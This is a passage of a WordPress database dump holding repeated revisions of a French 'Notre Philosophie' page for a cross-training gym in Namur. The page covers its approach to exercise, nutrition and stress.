(299, 1, '2013-07-04 19:10:38', '2013-07-04 19:10:38', '<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:10:38', '2013-07-04 19:10:38', '', 5, 'http://www.crosstrainingcenter.be/5-revision-45/', 0, 'revision', '', 0),
(301, 1, '2013-07-04 19:11:52', '2013-07-04 19:11:52', '<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;<br>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:11:52', '2013-07-04 19:11:52', '', 5, 'http://www.crosstrainingcenter.be/5-revision-47/', 0, 'revision', '', 0),
(300, 1, '2013-07-04 19:11:13', '2013-07-04 19:11:13', '<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;<br>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:11:13', '2013-07-04 19:11:13', '', 5, 'http://www.crosstrainingcenter.be/5-revision-46/', 0, 'revision', '', 0),
(302, 1, '2013-07-04 19:13:28', '2013-07-04 19:13:28', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:13:28', '2013-07-04 19:13:28', '', 5, 'http://www.crosstrainingcenter.be/5-revision-48/', 0, 'revision', '', 0),
(303, 1, '2013-07-04 19:14:58', '2013-07-04 19:14:58', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 100px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:14:58', '2013-07-04 19:14:58', '', 5, 'http://www.crosstrainingcenter.be/5-revision-49/', 0, 'revision', '', 0),
(304, 1, '2013-07-04 19:15:48', '2013-07-04 19:15:48', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 20px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:15:48', '2013-07-04 19:15:48', '', 5, 'http://www.crosstrainingcenter.be/5-revision-50/', 0, 'revision', '', 0),
(305, 1, '2013-07-04 19:16:05', '2013-07-04 19:16:05', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 900px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:16:05', '2013-07-04 19:16:05', '', 5, 'http://www.crosstrainingcenter.be/5-revision-51/', 0, 'revision', '', 0),
(306, 1, '2013-07-04 19:16:23', '2013-07-04 19:16:23', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:16:23', '2013-07-04 19:16:23', '', 5, 'http://www.crosstrainingcenter.be/5-revision-52/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(307, 1, '2013-07-04 19:16:45', '2013-07-04 19:16:45', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:16:45', '2013-07-04 19:16:45', '', 5, 'http://www.crosstrainingcenter.be/5-revision-53/', 0, 'revision', '', 0),
(308, 1, '2013-07-04 19:17:07', '2013-07-04 19:17:07', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 350px;\"><a 